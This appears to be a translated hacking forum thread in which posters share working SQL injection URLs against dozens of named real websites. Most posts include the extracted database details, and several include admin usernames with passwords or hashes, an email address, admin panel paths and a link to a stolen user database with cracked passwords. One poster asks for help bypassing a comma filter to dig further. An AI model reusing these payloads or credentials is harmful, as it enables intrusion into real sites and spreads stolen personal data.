http://www.deco10.com/index.php?inc=lis&cat_id=-999+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
It is possible if the main query is an update query or an insert query. Only queries of the same type can be combined; different types cannot.
frugalreader.com, something like a book exchange for private individuals (SQL-inj + DB)
SQL-inj:
Code: http://www.frugalreader.com/books.php?searchMethod=basic_search&subject_id=-1+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,nickname,password,email),8,9+FROM+user/*&doSearch=1&searchSubject=1&showBooks=1&title=&author=&isbn=
DB (4185 of 4613 (almost 91%) passwords decrypted): http://dinar007.by.ru/hbd/base_frugalreader.zip
Archive password: antichat.ru
www.lrn.ru
Code: http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,user(),database(),version()),2/*
lrn_ru@localhost:lrn_ru:5.0.46-log/2 (no file_priv)
Code: http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,username,password),2+from+users+where+username+like+%22Vitls%22/*
installation path: /var/www/vhosts/lrn.ru/htdocs/lrnphplib/doclib.php
admin panel: http://www.lrn.ru/admin (I couldn't figure out how to upload a shell through it)
Vitls:gjhextybt
HTML: http://alterego.tut.by/downloads/index.php?action=category&id=10'+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7/* [email protected]:alteregotutby
HTML: http://www.climatelab.ru/index.php?action=pages&id=4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*
5.0.24a climatea_climat@localhost climatea_climat
There is access to the schema, but I couldn't find the admin
channelg.tv
HTML: http://www.channelg.tv/project.php?focus_id=999999+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3/*&page_id=54
channelg@localhost:4.0.24:channelg
There's some kind of CMS there...
uginfo.sfedu.ru
HTML: http://uginfo.sfedu.ru/news/news.php?newsId=-1194414947+union+select+null,null,null,null,null,null/**/
sgcs.fcm.unc.edu.ar
HTML: http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+USER/**/
HTML: http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+version()/**/
user - postgres
version() - PostgreSQL 8.1.10 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)
HTML: http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES/**/ - table names
HTML: http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS/**/ - column names
Code: http://www.netlink.ru/index.php?action=pages&id=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4/* netlink_netltbn@localhost:netlink_netltbn:5.0.24a Code: http://www.homeopath.ru/index.php?action=pages&id=99999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/* homelogin@localhost:homeopath:4.1.22
The exam session ate my brain :\
---
http://www.chatman.ru/index.php?show=search&id=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9/*
4.1.22-standard/chatman_chatman/chatman_u51279@localhost
-----------------------------------------------------------------------------
http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10/*
4.1.21/mmp/mmp@localhost
http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,login,password),3,4,5,6,7,8,9,10+from+users/*
login/password admin/mrkroz2909
--------------------------------------------------------------------------
And here some hellishly good network technology specialists are threatening vile hackers
http://misteria.koptevo.net/modules.php?name=Mediacatalog&pa=showMediacatalog&pid=-1+union+select+1/*
http://www.peekvid.com Code: http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,version(),user(),database())/* 5.0.22root@kentuckyprivpeekvid_v2 Code: http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,user,password)+from+mysql.user/* Root67ef27e02618b87a:ZAQxsw
http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user())
5.0.51/hdds/hdds@localhost
http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,username,password,email,icq)+from+forums_auth+limit+0,1
login/hash/email/ICQ
Cavaler/50cc3872ca61179a359e6263a3fd3d43/[email protected]/48555995
Does anyone need the newspaper Trud? Well then, here you go -
Code: http://www.trud.ru/issue/shortnews.php?id=-64066+union+select+1,2,user(),version(),5,6,7/*
trudinfo@localhost 4.1.21-log
Code: http://info.l2r.ru/?part=items&id=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20(%22henna%22,%22drops_5%22))--
The tables are henna and drops_5; I couldn't get any further because commas are harshly filtered. I tried various methods, including 0x2c, chars, etc. If anyone finds a substitute for this comma, please post the info here or send it by PM)
Code: http://www.freegaming.de/index.php?option=com_puarcade&Itemid=92&fid=-1+union+select+concat(username,0x3a,password)+from+jos_users/*
CMS I-cont
_________________________________
The culprit behind this mess:
http://www.i-market.ru/news/?id=-434+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+imarket_users/*
_________________________________
The admin panels are located at http://site.ru/adm
The password hashes are plain md5
_________________________________
P.S. Hacked using a Nokia N70 phone, the Opera-mini (mod) browser and... hands that are not entirely crooked